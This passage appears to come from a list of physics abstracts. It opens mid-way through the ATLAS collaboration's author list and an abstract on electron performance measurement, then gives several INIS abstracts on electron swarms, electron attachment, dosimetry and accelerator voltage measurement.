Allison; McCarthy, Robert; McCarthy, Tom; McCubbin, Norman; McFarlane, Kenneth; Mcfayden, Josh; McGlone, Helen; Mchedlidze, Gvantsa; McLaren, Robert Andrew; Mclaughlan, Tom; McMahon, Steve; McPherson, Robert; Meade, Andrew; Mechnich, Joerg; Mechtel, Markus; Medinnis, Mike; Meera-Lebbai, Razzak; Meguro, Tatsuma; Mehdiyev, Rashid; Mehlhase, Sascha; Mehta, Andrew; Meier, Karlheinz; Meinhardt, Jens; Meirose, Bernhard; Melachrinos, Constantinos; Mellado Garcia, Bruce Rafael; Mendoza Navas, Luis; Meng, Zhaoxia; Mengarelli, Alberto; Menke, Sven; Menot, Claude; Meoni, Evelin; Mercurio, Kevin Michael; Mermod, Philippe; Merola, Leonardo; Meroni, Chiara; Merritt, Frank; Messina, Andrea; Metcalfe, Jessica; Mete, Alaettin Serhan; Meuser, Stefan; Meyer, Carsten; Meyer, Jean-Pierre; Meyer, Jochen; Meyer, Joerg; Meyer, Thomas Christian; Meyer, W Thomas; Miao, Jiayuan; Michal, Sebastien; Micu, Liliana; Middleton, Robin; Miele, Paola; Migas, Sylwia; Mijović, Liza; Mikenberg, Giora; Mikestikova, Marcela; Mikuž, Marko; Miller, David; Miller, Robert; Mills, Bill; Mills, Corrinne; Milov, Alexander; Milstead, David; Milstein, Dmitry; Minaenko, Andrey; Miñano, Mercedes; Minashvili, Irakli; Mincer, Allen; Mindur, Bartosz; Mineev, Mikhail; Ming, Yao; Mir, Lluisa-Maria; Mirabelli, Giovanni; Miralles Verge, Lluis; Misiejuk, Andrzej; Mitrevski, Jovan; Mitrofanov, Gennady; Mitsou, Vasiliki A; Mitsui, Shingo; Miyagawa, Paul; Miyazaki, Kazuki; Mjörnmark, Jan-Ulf; Moa, Torbjoern; Mockett, Paul; Moed, Shulamit; Moeller, Victoria; Mönig, Klaus; Möser, Nicolas; Mohapatra, Soumya; Mohr, Wolfgang; Mohrdieck-Möck, Susanne; Moisseev, Artemy; Moles-Valls, Regina; Molina-Perez, Jorge; Monk, James; Monnier, Emmanuel; Montesano, Simone; Monticelli, Fernando; Monzani, Simone; Moore, Roger; Moorhead, Gareth; Mora Herrera, Clemencia; Moraes, Arthur; Morange, Nicolas; Morel, Julien; Morello, Gianfranco; Moreno, Deywis; Moreno Llácer, María; Morettini, Paolo; Morii, Masahiro; Morin, Jerome; Morita, Youhei; Morley, Anthony Keith; Mornacchi, Giuseppe; Morozov, Sergey; Morris, John; Morvaj, Ljiljana; Moser, Hans-Guenther; Mosidze, Maia; Moss, Josh; Mount, Richard; Mountricha, Eleni; Mouraviev, Sergei; Moyse, Edward; Mudrinic, Mihajlo; Mueller, Felix; Mueller, James; Mueller, Klemens; Müller, Thomas; Muenstermann, Daniel; Muir, Alex; Munwes, Yonathan; Murray, Bill; Mussche, Ido; Musto, Elisa; Myagkov, Alexey; Myska, Miroslav; Nadal, Jordi; Nagai, Koichi; Nagano, Kunihiro; Nagasaka, Yasushi; Nairz, Armin Michael; Nakahama, Yu; Nakamura, Koji; Nakano, Itsuo; Nanava, Gizo; Napier, Austin; Nash, Michael; Nation, Nigel; Nattermann, Till; Naumann, Thomas; Navarro, Gabriela; Neal, Homer; Nebot, Eduardo; Nechaeva, Polina; Negri, Andrea; Negri, Guido; Nektarijevic, Snezana; Nelson, Silke; Nelson, Timothy Knight; Nemecek, Stanislav; Nemethy, Peter; Nepomuceno, Andre Asevedo; Nessi, Marzio; Nesterov, Stanislav; Neubauer, Mark; Neusiedl, Andrea; Neves, Ricardo; Nevski, Pavel; Newman, Paul; Nguyen Thi Hong, Van; Nickerson, Richard; Nicolaidou, Rosy; Nicolas, Ludovic; Nicquevert, Bertrand; Niedercorn, Francois; Nielsen, Jason; Niinikoski, Tapio; Nikiforou, Nikiforos; Nikiforov, Andriy; Nikolaenko, Vladimir; Nikolaev, Kirill; Nikolic-Audit, Irena; Nikolics, Katalin; Nikolopoulos, Konstantinos; Nilsen, Henrik; Nilsson, Paul; Ninomiya, Yoichi; Nisati, Aleandro; Nishiyama, Tomonori; Nisius, Richard; Nodulman, Lawrence; Nomachi, Masaharu; Nomidis, Ioannis; Nordberg, Markus; Nordkvist, Bjoern; Norton, Peter; Novakova, Jana; Nozaki, Mitsuaki; Nožička, Miroslav; Nozka, Libor; Nugent, Ian Michael; Nuncio-Quiroz, Adriana-Elizabeth; Nunes Hanninger, Guilherme; Nunnemann, Thomas; Nurse, Emily; Nyman, Tommi; O'Brien, Brendan Joseph; O'Neale, Steve; O'Neil, Dugan; O'Shea, Val; Oakham, Gerald; Oberlack, Horst; Ocariz, Jose; Ochi, Atsuhiko; Oda, Susumu; Odaka, Shigeru; Odier, Jerome; Ogren, Harold; Oh, Alexander; Oh, Seog; Ohm, Christian; Ohshima, Takayoshi; Ohshita, Hidetoshi; Ohska, Tokio Kenneth; Ohsugi, Takashi; Okada, Shogo; Okawa, Hideki; Okumura, Yasuyuki; Okuyama, Toyonobu; Olcese, Marco; Olchevski, Alexander; Oliveira, Miguel Alfonso; Oliveira Damazio, Denis; Oliver Garcia, Elena; Olivito, Dominick; Olszewski, Andrzej; Olszowska, Jolanta; Omachi, Chihiro; Onofre, António; Onyisi, Peter; Oram, Christopher; Oreglia, Mark; Oren, Yona; Orestano, Domizia; Orlov, Iliya; Oropeza Barrera, Cristina; Orr, Robert; Osculati, Bianca; Ospanov, Rustem; Osuna, Carlos; Otero y Garzon, Gustavo; Ottersbach, John; Ouchrif, Mohamed; Ould-Saada, Farid; Ouraou, Ahmimed; Ouyang, Qun; Owen, Mark; Owen, Simon; Ozcan, Veysi Erkcan; Ozturk, Nurcan; Pacheco Pages, Andres; Padilla Aranda, Cristobal; Pagan Griso, Simone; Paganis, Efstathios; Paige, Frank; Pajchel, Katarina; Palacino, Gabriel; Paleari, Chiara; Palestini, Sandro; Pallin, Dominique; Palma, Alberto; Palmer, Jody; Pan, Yibin; Panagiotopoulou, Evgenia; Panes, Boris; Panikashvili, Natalia; Panitkin, Sergey; Pantea, Dan; Panuskova, Monika; Paolone, Vittorio; Papadelis, Aras; Papadopoulou, Theodora; Paramonov, Alexander; Park, Woochun; Parker, Andy; Parodi, Fabrizio; Parsons, John; Parzefall, Ulrich; Pasqualucci, Enrico; Passeri, Antonio; Pastore, Fernanda; Pastore, Francesca; Pásztor, Gabriella; Pataraia, Sophio; Patel, Nikhul; Pater, Joleen; Patricelli, Sergio; Pauly, Thilo; Pecsy, Martin; Pedraza Morales, Maria Isabel; Peleganchuk, Sergey; Peng, Haiping; Pengo, Ruggero; Penson, Alexander; Penwell, John; Perantoni, Marcelo; Perez, Kerstin; Perez Cavalcanti, Tiago; Perez Codina, Estel; Pérez García-Estañ, María Teresa; Perez Reale, Valeria; Perini, Laura; Pernegger, Heinz; Perrino, Roberto; Perrodo, Pascal; Persembe, Seda; Peshekhonov, Vladimir; Petersen, Brian; Petersen, Jorgen; Petersen, Troels; Petit, Elisabeth; Petridis, Andreas; Petridou, Chariclia; Petrolo, Emilio; Petrucci, Fabrizio; Petschull, Dennis; Petteni, Michele; Pezoa, Raquel; Phan, Anna; Phillips, Alan; Phillips, Peter William; Piacquadio, Giacinto; Piccaro, Elisa; Piccinini, Maurizio; Pickford, Andrew; Piec, Sebastian Marcin; Piegaia, Ricardo; Pilcher, James; Pilkington, Andrew; Pina, João Antonio; Pinamonti, Michele; Pinder, Alex; Pinfold, James; Ping, Jialun; Pinto, Belmiro; Pirotte, Olivier; Pizio, Caterina; Placakyte, Ringaile; Plamondon, Mathieu; Plano, Will; Pleier, Marc-Andre; Pleskach, Anatoly; Poblaguev, Andrei; Poddar, Sahill; Podlyski, Fabrice; Poggioli, Luc; Poghosyan, Tatevik; Pohl, Martin; Polci, Francesco; Polesello, Giacomo; Policicchio, Antonio; Polini, Alessandro; Poll, James; Polychronakos, Venetios; Pomarede, Daniel Marc; Pomeroy, Daniel; Pommès, Kathy; Pontecorvo, Ludovico; Pope, Bernard; Popeneciu, Gabriel Alexandru; Popovic, Dragan; Poppleton, Alan; Portell Bueso, Xavier; Porter, Robert; Posch, Christoph; Pospelov, Guennady; Pospisil, Stanislav; Potrap, Igor; Potter, Christina; Potter, Christopher; Poulard, Gilbert; Poveda, Joaquin; Prabhu, Robindra; Pralavorio, Pascal; Prasad, Srivas; Pravahan, Rishiraj; Prell, Soeren; Pretzl, Klaus Peter; Pribyl, Lukas; Price, Darren; Price, Lawrence; Price, Michael John; Prichard, Paul; Prieur, Damien; Primavera, Margherita; Prokofiev, Kirill; Prokoshin, Fedor; Protopopescu, Serban; Proudfoot, James; Prudent, Xavier; Przysiezniak, Helenka; Psoroulas, Serena; Ptacek, Elizabeth; Pueschel, Elisa; Purdham, John; Purohit, Milind; Puzo, Patrick; Pylypchenko, Yuriy; Qian, Jianming; Qian, Zuxuan; Qin, Zhonghua; Quadt, Arnulf; Quarrie, David; Quayle, William; Quinonez, Fernando; Raas, Marcel; Radescu, Voica; Radics, Balint; Rador, Tonguc; Ragusa, Francesco; Rahal, Ghita; Rahimi, Amir; Rahm, David; Rajagopalan, Srinivasan; Rammensee, Michael; Rammes, Marcus; Ramstedt, Magnus; Randle-Conde, Aidan Sean; Randrianarivony, Koloina; Ratoff, Peter; Rauscher, Felix; Rauter, Emanuel; Raymond, Michel; Read, Alexander Lincoln; Rebuzzi, Daniela; Redelbach, Andreas; Redlinger, George; Reece, Ryan; Reeves, Kendall; Reichold, Armin; Reinherz-Aronis, Erez; Reinsch, Andreas; Reisinger, Ingo; Reljic, Dusan; Rembser, Christoph; Ren, Zhongliang; Renaud, Adrien; Renkel, Peter; Rescigno, Marco; Resconi, Silvia; Resende, Bernardo; Reznicek, Pavel; Rezvani, Reyhaneh; Richards, Alexander; Richter, Robert; Richter-Was, Elzbieta; Ridel, Melissa; Rieke, Stefan; Rijpstra, Manouk; Rijssenbeek, Michael; Rimoldi, Adele; Rinaldi, Lorenzo; Rios, Ryan Randy; Riu, Imma; Rivoltella, Giancesare; Rizatdinova, Flera; Rizvi, Eram; Robertson, Steven; Robichaud-Veronneau, Andree; Robinson, Dave; Robinson, James; Robinson, Mary; Robson, Aidan; Rocha de Lima, Jose Guilherme; Roda, Chiara; Roda Dos Santos, Denis; Rodier, Stephane; Rodriguez, Diego; Roe, Adam; Roe, Shaun; Røhne, Ole; Rojo, Victoria; Rolli, Simona; Romaniouk, Anatoli; Romanov, Victor; Romeo, Gaston; Roos, Lydia; Ros, Eduardo; Rosati, Stefano; Rosbach, Kilian; Rose, Anthony; Rose, Matthew; Rosenbaum, Gabriel; Rosenberg, Eli; Rosendahl, Peter Lundgaard; Rosenthal, Oliver; Rosselet, Laurent; Rossetti, Valerio; Rossi, Elvira; Rossi, Leonardo Paolo; Rossi, Lucio; Rotaru, Marina; Roth, Itamar; Rothberg, Joseph; Rousseau, David; Royon, Christophe; Rozanov, Alexander; Rozen, Yoram; Ruan, Xifeng; Rubinskiy, Igor; Ruckert, Benjamin; Ruckstuhl, Nicole; Rud, Viacheslav; Rudolph, Christian; Rudolph, Gerald; Rühr, Frederik; Ruggieri, Federico; Ruiz-Martinez, Aranzazu; Rulikowska-Zarebska, Elzbieta; Rumiantsev, Viktor; Rumyantsev, Leonid; Runge, Kay; Runolfsson, Ogmundur; Rurikova, Zuzana; Rusakovich, Nikolai; Rust, Dave; Rutherfoord, John; Ruwiedel, Christoph; Ruzicka, Pavel; Ryabov, Yury; Ryadovikov, Vasily; Ryan, Patrick; Rybar, Martin; Rybkin, Grigori; Ryder, Nick; Rzaeva, Sevda; Saavedra, Aldo; Sadeh, Iftach; Sadrozinski, Hartmut; Sadykov, Renat; Safai Tehrani, Francesco; Sakamoto, Hiroshi; Salamanna, Giuseppe; Salamon, Andrea; Saleem, Muhammad; Salihagic, Denis; Salnikov, Andrei; Salt, José; Salvachua Ferrando, Belén; Salvatore, Daniela; Salvatore, Pasquale Fabrizio; Salvucci, Antonio; Salzburger, Andreas; Sampsonidis, Dimitrios; Samset, Björn Hallvard; Sanchez, Arturo; Sandaker, Heidi; Sander, Heinz Georg; Sanders, Michiel; Sandhoff, Marisa; Sandoval, Tanya; Sandoval, Carlos; Sandstroem, Rikard; Sandvoss, Stephan; Sankey, Dave; Sansoni, Andrea; Santamarina Rios, Cibran; Santoni, Claudio; Santonico, Rinaldo; Santos, Helena; Saraiva, João; Sarangi, Tapas; Sarkisyan-Grinbaum, Edward; Sarri, Francesca; Sartisohn, Georg; Sasaki, Osamu; Sasaki, Takashi; Sasao, Noboru; Satsounkevitch, Igor; Sauvage, Gilles; Sauvan, Emmanuel; Sauvan, Jean-Baptiste; Savard, Pierre; Savinov, Vladimir; Savu, Dan Octavian; Savva, Panagiota; Sawyer, Lee; Saxon, David; Says, Louis-Pierre; Sbarra, Carla; Sbrizzi, Antonio; Scallon, Olivia; Scannicchio, Diana; Schaarschmidt, Jana; Schacht, Peter; Schäfer, Uli; Schaepe, Steffen; Schaetzel, Sebastian; Schaffer, Arthur; Schaile, Dorothee; Schamberger, R. Dean; Schamov, Andrey; Scharf, Veit; Schegelsky, Valery; Scheirich, Daniel; Schernau, Michael; Scherzer, Max; Schiavi, Carlo; Schieck, Jochen; Schioppa, Marco; Schlenker, Stefan; Schlereth, James; Schmidt, Evelyn; Schmieden, Kristof; Schmitt, Christian; Schmitt, Sebastian; Schmitz, Martin; Schöning, André; Schott, Matthias; Schouten, Doug; Schovancova, Jaroslava; Schram, Malachi; Schroeder, Christian; Schroer, Nicolai; Schuh, Silvia; Schuler, Georges; Schultes, Joachim; Schultz-Coulon, Hans-Christian; Schulz, Holger; Schumacher, Jan; Schumacher, Markus; Schumm, Bruce; Schune, Philippe; Schwanenberger, Christian; Schwartzman, Ariel; Schwemling, Philippe; Schwienhorst, Reinhard; Schwierz, Rainer; Schwindling, Jerome; Schwindt, Thomas; Scott, Bill; Searcy, Jacob; Sedykh, Evgeny; Segura, Ester; Seidel, Sally; Seiden, Abraham; Seifert, Frank; Seixas, José; Sekhniaidze, Givi; Seliverstov, Dmitry; Sellden, Bjoern; Sellers, Graham; Seman, Michal; Semprini-Cesari, Nicola; Serfon, Cedric; Serin, Laurent; Seuster, Rolf; Severini, Horst; Sevior, Martin; Sfyrla, Anna; Shabalina, Elizaveta; Shamim, Mansoora; Shan, Lianyou; Shank, James; Shao, Qi Tao; Shapiro, Marjorie; Shatalov, Pavel; Shaver, Leif; Shaw, Kate; Sherman, Daniel; Sherwood, Peter; Shibata, Akira; Shichi, Hideharu; Shimizu, Shima; Shimojima, Makoto; Shin, Taeksu; Shmeleva, Alevtina; Shochet, Mel; Short, Daniel; Shupe, Michael; Sicho, Petr; Sidoti, Antonio; Siebel, Anca-Mirela; Siegert, Frank; Siegrist, James; Sijacki, Djordje; Silbert, Ohad; Silva, José; Silver, Yiftah; Silverstein, Daniel; Silverstein, Samuel; Simak, Vladislav; Simard, Olivier; Simic, Ljiljana; Simion, Stefan; Simmons, Brinick; Simonyan, Margar; Sinervo, Pekka; Sinev, Nikolai; Sipica, Valentin; Siragusa, Giovanni; Sircar, Anirvan; Sisakyan, Alexei; Sivoklokov, Serguei; Sjölin, Jörgen; Sjursen, Therese; Skinnari, Louise Anastasia; Skovpen, Kirill; Skubic, Patrick; Skvorodnev, Nikolai; Slater, Mark; Slavicek, Tomas; Sliwa, Krzysztof; Sloan, Terrence; Sloper, John erik; Smakhtin, Vladimir; Smirnov, Sergei; Smirnova, Lidia; Smirnova, Oxana; Smith, Ben Campbell; Smith, Douglas; Smith, Kenway; Smizanska, Maria; Smolek, Karel; Snesarev, Andrei; Snow, Steve; Snow, Joel; Snuverink, Jochem; Snyder, Scott; Soares, Mara; Sobie, Randall; Sodomka, Jaromir; Soffer, Abner; Solans, Carlos; Solar, Michael; Solc, Jaroslav; Soldatov, Evgeny; Soldevila, Urmila; Solfaroli Camillocci, Elena; Solodkov, Alexander; Solovyanov, Oleg; Sondericker, John; Soni, Nitesh; Sopko, Vit; Sopko, Bruno; Sorbi, Massimo; Sosebee, Mark; Soukharev, Andrey; Spagnolo, Stefania; Spanò, Francesco; Spighi, Roberto; Spigo, Giancarlo; Spila, Federico; Spiriti, Eleuterio; Spiwoks, Ralf; Spousta, Martin; Spreitzer, Teresa; Spurlock, Barry; St Denis, Richard Dante; Stahl, Thorsten; Stahlman, Jonathan; Stamen, Rainer; Stanecka, Ewa; Stanek, Robert; Stanescu, Cristian; Stapnes, Steinar; Starchenko, Evgeny; Stark, Jan; Staroba, Pavel; Starovoitov, Pavel; Staude, Arnold; Stavina, Pavel; Stavropoulos, Georgios; Steele, Genevieve; Steinbach, Peter; Steinberg, Peter; Stekl, Ivan; Stelzer, Bernd; Stelzer, Harald Joerg; Stelzer-Chilton, Oliver; Stenzel, Hasko; Stevenson, Kyle; Stewart, Graeme; Stillings, Jan Andre; Stockmanns, Tobias; Stockton, Mark; Stoerig, Kathrin; Stoicea, Gabriel; Stonjek, Stefan; Strachota, Pavel; Stradling, Alden; Straessner, Arno; Strandberg, Jonas; Strandberg, Sara; Strandlie, Are; Strang, Michael; Strauss, Emanuel; Strauss, Michael; Strizenec, Pavol; Ströhmer, Raimund; Strom, David; Strong, John; Stroynowski, Ryszard; Strube, Jan; Stugu, Bjarne; Stumer, Iuliu; Stupak, John; Sturm, Philipp; Soh, Dart-yin; Su, Dong; Subramania, Halasya Siva; Succurro, Antonella; Sugaya, Yorihito; Sugimoto, Takuya; Suhr, Chad; Suita, Koichi; Suk, Michal; Sulin, Vladimir; Sultansoy, Saleh; Sumida, Toshi; Sun, Xiaohu; Sundermann, Jan Erik; Suruliz, Kerim; Sushkov, Serge; Susinno, Giancarlo; Sutton, Mark; Suzuki, Yu; Suzuki, Yuta; Svatos, Michal; Sviridov, Yuri; Swedish, Stephen; Sykora, Ivan; Sykora, Tomas; Szeless, Balazs; Sánchez, Javier; Ta, Duc; Tackmann, Kerstin; Taffard, Anyes; Tafirout, Reda; Taga, Adrian; Taiblum, Nimrod; Takahashi, Yuta; Takai, Helio; Takashima, Ryuichi; Takeda, Hiroshi; Takeshita, Tohru; Talby, Mossadek; Talyshev, Alexey; Tamsett, Matthew; Tanaka, Junichi; Tanaka, Reisaburo; Tanaka, Satoshi; Tanaka, Shuji; Tanaka, Yoshito; Tani, Kazutoshi; Tannoury, Nancy; Tappern, Geoffrey; Tapprogge, Stefan; Tardif, Dominique; Tarem, Shlomit; Tarrade, Fabien; Tartarelli, Giuseppe Francesco; Tas, Petr; Tasevsky, Marek; Tassi, Enrico; Tatarkhanov, Mous; Taylor, Christopher; Taylor, Frank; Taylor, Geoffrey; Taylor, Wendy; Teinturier, Marthe; Teixeira Dias Castanheira, Matilde; Teixeira-Dias, Pedro; Temming, Kim Katrin; Ten Kate, Herman; Teng, Ping-Kun; Terada, Susumu; Terashi, Koji; Terron, Juan; Terwort, Mark; Testa, Marianna; Teuscher, Richard; Thadome, Jocelyn; Therhaag, Jan; Theveneaux-Pelzer, Timothée; Thioye, Moustapha; Thoma, Sascha; Thomas, Juergen; Thompson, Emily; Thompson, Paul; Thompson, Peter; Thompson, Stan; Thomson, Evelyn; Thomson, Mark; Thun, Rudolf; Tian, Feng; Tic, Tomáš; Tikhomirov, Vladimir; Tikhonov, Yury; Timmermans, Charles; Tipton, Paul; Tique Aires Viegas, Florbela De Jes; Tisserant, Sylvain; Tobias, Jürgen; Toczek, Barbara; Todorov, Theodore; Todorova-Nova, Sharka; Toggerson, Brokk; Tojo, Junji; Tokár, Stanislav; Tokunaga, Kaoru; Tokushuku, Katsuo; Tollefson, Kirsten; Tomoto, Makoto; Tompkins, Lauren; Toms, Konstantin; Tong, Guoliang; Tonoyan, Arshak; Topfel, Cyril; Topilin, Nikolai; Torchiani, Ingo; Torrence, Eric; Torres, Heberth; Torró Pastor, Emma; Toth, Jozsef; Touchard, Francois; Tovey, Daniel; Traynor, Daniel; Trefzger, Thomas; Tremblet, Louis; Tricoli, Alesandro; Trigger, Isabel Marian; Trincaz-Duvoid, Sophie; Trinh, Thi Nguyet; Tripiana, Martin; Trischuk, William; Trivedi, Arjun; Trocmé, Benjamin; Troncon, Clara; Trottier-McDonald, Michel; Trzupek, Adam; Tsarouchas, Charilaos; Tseng, Jeffrey; Tsiakiris, Menelaos; Tsiareshka, Pavel; Tsionou, Dimitra; Tsipolitis, Georgios; Tsiskaridze, Vakhtang; Tskhadadze, Edisher; Tsukerman, Ilya; Tsulaia, Vakhtang; Tsung, Jieh-Wen; Tsuno, Soshi; Tsybychev, Dmitri; Tua, Alan; Tuggle, Joseph; Turala, Michal; Turecek, Daniel; Turk Cakir, Ilkay; Turlay, Emmanuel; Turra, Ruggero; Tuts, Michael; Tykhonov, Andrii; Tylmad, Maja; Tyndel, Mike; Tyrvainen, Harri; Tzanakos, George; Uchida, Kirika; Ueda, Ikuo; Ueno, Ryuichi; Ugland, Maren; Uhlenbrock, Mathias; Uhrmacher, Michael; Ukegawa, Fumihiko; Unal, Guillaume; Underwood, David; Undrus, Alexander; Unel, Gokhan; Unno, Yoshinobu; Urbaniec, Dustin; Urkovsky, Evgeny; Urrejola, Pedro; Usai, Giulio; Uslenghi, Massimiliano; Vacavant, Laurent; Vacek, Vaclav; Vachon, Brigitte; Vahsen, Sven; Valenta, Jan; Valente, Paolo; Valentinetti, Sara; Valkar, Stefan; Valladolid Gallego, Eva; Vallecorsa, Sofia; Valls Ferrer, Juan Antonio; van der Graaf, Harry; van der Kraaij, Erik; Van Der Leeuw, Robin; van der Poel, Egge; van der Ster, Daniel; Van Eijk, Bob; van Eldik, Niels; van Gemmeren, Peter; van Kesteren, Zdenko; van Vulpen, Ivo; Vandelli, Wainer; Vandoni, Giovanna; Vaniachine, Alexandre; Vankov, Peter; Vannucci, Francois; Varela Rodriguez, Fernando; Vari, Riccardo; Varouchas, Dimitris; Vartapetian, Armen; Varvell, Kevin; Vassilakopoulos, Vassilios; Vazeille, Francois; Vegni, Guido; Veillet, Jean-Jacques; Vellidis, Constantine; Veloso, Filipe; Veness, Raymond; Veneziano, Stefano; Ventura, Andrea; Ventura, Daniel; Venturi, Manuela; Venturi, Nicola; Vercesi, Valerio; Verducci, Monica; Verkerke, Wouter; Vermeulen, Jos; Vest, Anja; Vetterli, Michel; Vichou, Irene; Vickey, Trevor; Viehhauser, Georg; Viel, Simon; Villa, Mauro; Villaplana Perez, Miguel; Vilucchi, Elisabetta; Vincter, Manuella; Vinek, Elisabeth; Vinogradov, Vladimir; Virchaux, Marc; Virzi, Joseph; Vitells, Ofer; Viti, Michele; Vivarelli, Iacopo; Vives Vaque, Francesc; Vlachos, Sotirios; Vlasak, Michal; Vlasov, Nikolai; Vogel, Adrian; Vokac, Petr; Volpi, Guido; Volpi, Matteo; Volpini, Giovanni; von der Schmitt, Hans; von Loeben, Joerg; von Radziewski, Holger; von Toerne, Eckhard; Vorobel, Vit; Vorobiev, Alexander; Vorwerk, Volker; Vos, Marcel; Voss, Rudiger; Voss, Thorsten Tobias; Vossebeld, Joost; Vranjes, Nenad; Vranjes Milosavljevic, Marija; Vrba, Vaclav; Vreeswijk, Marcel; Vu Anh, Tuan; Vuillermet, Raphael; Vukotic, Ilija; Wagner, Wolfgang; Wagner, Peter; Wahlen, Helmut; Wakabayashi, Jun; Walbersloh, Jorg; Walch, Shannon; Walder, James; Walker, Rodney; Walkowiak, Wolfgang; Wall, Richard; Waller, Peter; Wang, Chiho; Wang, Haichen; Wang, Hulin; Wang, Jike; Wang, Jin; Wang, Joshua C; Wang, Rui; Wang, Song-Ming; Warburton, Andreas; Ward, Patricia; Warsinsky, Markus; Watkins, Peter; Watson, Alan; Watson, Miriam; Watts, Gordon; Watts, Stephen; Waugh, Anthony; Waugh, Ben; Weber, Jens; Weber, Marc; Weber, Michele; Weber, Pavel; Weidberg, Anthony; Weigell, Philipp; Weingarten, Jens; Weiser, Christian; Wellenstein, Hermann; Wells, Phillippa; Wen, Mei; Wenaus, Torre; Wendler, Shanti; Weng, Zhili; Wengler, Thorsten; Wenig, Siegfried; Wermes, Norbert; Werner, Matthias; Werner, Per; Werth, Michael; Wessels, Martin; Weydert, Carole; Whalen, Kathleen; Wheeler-Ellis, Sarah Jane; Whitaker, Scott; White, Andrew; White, Martin; Whitehead, Samuel Robert; Whiteson, Daniel; Whittington, Denver; Wicek, Francois; Wicke, Daniel; Wickens, Fred; Wiedenmann, Werner; Wielers, Monika; Wienemann, Peter; Wiglesworth, Craig; Wiik, Liv Antje Mari; Wijeratne, Peter Alexander; Wildauer, Andreas; Wildt, Martin Andre; Wilhelm, Ivan; Wilkens, Henric George; Will, Jonas Zacharias; Williams, Eric; Williams, Hugh; Willis, William; Willocq, Stephane; Wilson, John; Wilson, Michael Galante; Wilson, Alan; Wingerter-Seez, Isabelle; Winkelmann, Stefan; Winklmeier, Frank; Wittgen, Matthias; Wolter, Marcin Wladyslaw; Wolters, Helmut; Wong, Wei-Cheng; Wooden, Gemma; Wosiek, Barbara; Wotschack, Jorg; Woudstra, Martin; Wraight, Kenneth; Wright, Catherine; Wrona, Bozydar; Wu, Sau Lan; Wu, Xin; Wu, Yusheng; Wulf, Evan; Wunstorf, Renate; Wynne, Benjamin; Xaplanteris, Leonidas; Xella, Stefania; Xie, Song; Xie, Yigang; Xu, Chao; Xu, Da; Xu, Guofa; Yabsley, Bruce; Yacoob, Sahal; Yamada, Miho; Yamaguchi, Hiroshi; Yamamoto, Akira; Yamamoto, Kyoko; Yamamoto, Shimpei; Yamamura, Taiki; Yamanaka, Takashi; Yamaoka, Jared; Yamazaki, Takayuki; Yamazaki, Yuji; Yan, Zhen; Yang, Haijun; Yang, Un-Ki; Yang, Yi; Yang, Yi; Yang, Zhaoyu; Yanush, Serguei; Yao, Weiming; Yao, Yushu; Yasu, Yoshiji; Ybeles Smit, Gabriel Valentijn; Ye, Jingbo; Ye, Shuwei; Yilmaz, Metin; Yoosoofmiya, Reza; Yorita, Kohei; Yoshida, Riktura; Young, Charles; Youssef, Saul; Yu, Dantong; Yu, Jaehoon; Yu, Jie; Yuan, Li; Yurkewicz, Adam; Zaets, Vassilli; Zaidan, Remi; Zaitsev, Alexander; Zajacova, Zuzana; Zalite, Youris; Zanello, Lucia; Zarzhitsky, Pavel; Zaytsev, Alexander; Zeitnitz, Christian; Zeller, Michael; Zeman, Martin; Zemla, Andrzej; Zendler, Carolin; Zenin, Oleg; Ženiš, Tibor; Zenonos, Zenonas; Zenz, Seth; Zerwas, Dirk; Zevi della Porta, Giovanni; Zhan, Zhichao; Zhang, Dongliang; Zhang, Huaqiao; Zhang, Jinlong; Zhang, Xueyao; Zhang, Zhiqing; Zhao, Long; Zhao, Tianchi; Zhao, Zhengguo; Zhemchugov, Alexey; Zheng, Shuchen; Zhong, Jiahang; Zhou, Bing; Zhou, Ning; Zhou, Yue; Zhu, Cheng Guang; Zhu, Hongbo; Zhu, Junjie; Zhu, Yingchun; Zhuang, Xuai; Zhuravlov, Vadym; Zieminska, Daria; Zimmermann, Robert; Zimmermann, Simone; Zimmermann, Stephanie; Ziolkowski, Michael; Zitoun, Robert; Živković, Lidija; Zmouchko, Viatcheslav; Zobernig, Georg; Zoccoli, Antonio; Zolnierowski, Yves; Zsenei, Andras; zur Nedden, Martin; Zutshi, Vishnu; Zwalinski, Lukasz 2012-03-09 Detailed measurements of the electron performance of the ATLAS detector at the LHC are reported, using decays of the Z, W and J/psi particles. Data collected in 2010 at sqrt(s)=7 TeV are used, corresponding to an integrated luminosity of almost 40 pb^-1. The inter-alignment of the inner detector and the electromagnetic calorimeter, the determination of the electron energy scale and resolution, and the performance in terms of response uniformity and linearity are discussed. The electron identification, reconstruction and trigger efficiencies, as well as the charge misidentification probability, are also presented. 8. The effect of non-uniformities on the measured transport parameters of electron swarms in hydrogen International Nuclear Information System (INIS) Blevin, H.A.; Fletcher, J.; Hunter, S.R. 1978-05-01 Measurements of transport parameters of pulsed electron swarms moving through a low pressure gas by observation of the photon flux resulting from electron-molecule collisions have been recently reported. One of the possible sources of error in this kind of experiment is the variation of mean electron energy through the swarm. This effect is considered here along with the resulting variation of ionization and excitation frequency through the swarm. The validity of the experimental method is considered in the light of the above factors 9. A technique for the measurement of electron attachment to short-lived excited species International Nuclear Information System (INIS) Christophorou, L.G.; Pinnaduwage, L.A.; Bitouni, A.P. 1990-01-01 A technique is described for the measurement of electron attachment to short-lived (approx-lt 10 -9 s) excited species. Preliminary results are presented for photoenhanced electron attachment to short-lived electronically-excited states of triethylamine molecules produced by laser two-photon excitation. The attachment cross sections for these excited states are estimated to be >10 -11 cm 2 and are ∼10 7 larger compared to those for the unexcited (ground-state) molecules. 8 refs., 4 figs 10. Demonstration of relatively new electron dosimetry measurement techniques on the Mevatron 80 International Nuclear Information System (INIS) Meyer, J.A.; Palta, J.R.; Hogstrom, K.R. 1984-01-01 A comprehensive set of electron dosimetry measurements at 7, 10, 12, 15, and 18 MeV was made on a Mevatron 80. Dosimetry measurements presented include percentage depth dose, dose in the buildup region, field size dependence of output, output at extended distances, lead transmission measurements, and isodose curves. These beam measurements are presented to document the electron beam characteristics of this linear accelerator. Three relatively new dosimetry techniques, which have not been standardly used in the past, are illustrated. One technique determines the depth dose of fields too small to measure. A second technique accurately converts depth dose measured in polystyrene to depth dose in water. A third technique calculates the output at extended distances 11. Capacitive divider for output voltage measurement of intense electron beam accelerator International Nuclear Information System (INIS) Ding Desheng; Yi Lingzhi; Yu Binxiong; Hong Zhiqiang; Liu Jinliang 2012-01-01 A kind of simple-mechanism, easy-disassembly self-integrating capacitive divider used for measuring diode output voltage of intense electron beam accelerator (IEBA) is developed. The structure of the capacitive divider is described, and the capacitance value of the capacitive divider is calculated by theoretical analysis and electromagnetic simulation. The dependence of measurement voltage on electrical parameters such as 